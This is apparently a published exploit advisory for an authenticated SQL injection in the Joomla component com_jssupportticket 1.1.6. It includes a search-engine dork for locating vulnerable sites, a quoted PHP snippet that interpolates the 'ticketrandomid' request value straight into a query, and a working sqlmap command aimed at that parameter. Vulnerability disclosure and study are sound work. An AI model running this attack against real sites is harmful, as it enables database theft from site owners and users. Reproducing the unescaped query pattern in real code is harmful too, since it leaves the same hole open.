#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0

#####################################
#Vulnerability details:
#####################################
The vulnerable code is at line 31 of admin/models/ticketreply.php: the request-supplied value $data2['ticketrandomid'] (line 29) is interpolated directly into the SQL string on line 31 without escaping or parameter binding, so the WHERE clause can be altered by an authenticated user who can reach this code path.

...snip...
24 function storeTicketReplies($ticketid, $message, $created, $data2) {
25     if (!is_numeric($ticketid))
26         return false;
27
28     //validate reply for break down
29     $ticketrandomid = $data2['ticketrandomid']; //!!!
30     $db = $this->getDBo();
31     $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'"; //!!!
32     $db->setQuery($query);
33     $res = $db->loadResult();
34     if($res != $ticketid){
35         return false;
36     }//end
...snip...

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'